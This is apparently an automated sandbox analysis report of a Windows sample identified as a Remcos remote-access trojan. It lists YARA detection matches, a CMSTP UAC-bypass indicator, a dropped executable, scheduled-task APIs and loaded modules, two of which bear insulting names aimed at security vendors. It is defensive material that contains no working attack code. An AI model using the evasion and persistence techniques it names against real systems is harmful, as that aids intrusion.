                      Source: Yara matchFile source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ccrdlld.exe PID: 7120, type: MEMORYSTR

                      System Summary

                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, MapAnalyzer.csLarge array initialization: LinkSetMap: array initializer size 543568
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe File dump: OrionLegacyCLI.exe.0.dr 979567344
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe File dump: HardDiskSentinelBin.exe.5.dr 979567142
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ccrdlld.exe CA84EC6D70351B003D3CACB9F81BE030CC9DE7AC267CCE718173D4F42CBA2966
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: String function: 00406CC0 appears 34 times
                      Source: 4JwhvqLe8n.exeBinary or memory string: OriginalFilename vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exe, 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOriginLegacyCLI.exe@ vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exe, 00000000.00000002.2404009256.0000000002476000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameYtzlkwamt.exe" vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exe, 00000000.00000002.2404795981.00000000026A6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOriginLegacyCLI.exe@ vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exeBinary or memory string: OriginalFilenameOriginLegacyCLI.exe@ vs 4JwhvqLe8n.exe
                      Source: 4JwhvqLe8n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, MapAnalyzer.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, ResponderElement.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csCryptographic APIs: 'CreateDecryptor'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@6/5@5/4
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_00401020 LoadResource,LockResource,SizeofResource,0_2_00401020
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe File created: C:\Users\user\Videos\OrionLegacy
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                      Source: Yara matchFile source: 5.2.ccrdlld.exe.134a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000000.2580957765.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4046933344.0000000007F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2860397581.00000000134A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: 4JwhvqLe8n.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: 4JwhvqLe8n.exeReversingLabs: Detection: 42%
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe File read: C:\Users\user\Desktop\4JwhvqLe8n.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\4JwhvqLe8n.exe "C:\Users\user\Desktop\4JwhvqLe8n.exe"
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ccrdlld.exe C:\Users\user\AppData\Local\Temp\ccrdlld.exe
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeProcess created: C:\Users\user\AppData\Local\Temp\ccrdlld.exe "C:\Users\user\AppData\Local\Temp\ccrdlld.exe"
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeProcess created: C:\Users\user\AppData\Local\Temp\ccrdlld.exe "C:\Users\user\AppData\Local\Temp\ccrdlld.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: icmp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: crowdstrikeceoisextragay.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: sentinelisabadedrtrynexttimemaybe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: 4JwhvqLe8n.exeStatic file information: File size 2652160 > 1048576
                      Source: 4JwhvqLe8n.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x257400
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 4JwhvqLe8n.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 4JwhvqLe8n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\samcnary\Desktop\legacyPM\core\CoreService\runtime\OriginLegacyCLI.pdb source: 4JwhvqLe8n.exe, OrionLegacyCLI.exe.0.dr
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000003.00000002.4046933344.0000000007D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046933344.0000000007D9D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4048264340.0000000009C40000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: Srlfeb.pdb source: csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4047366440.0000000009410000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000003.00000002.4046933344.0000000007D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046933344.0000000007D9D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4048264340.0000000009C40000.00000004.08000000.00040000.00000000.sdmp
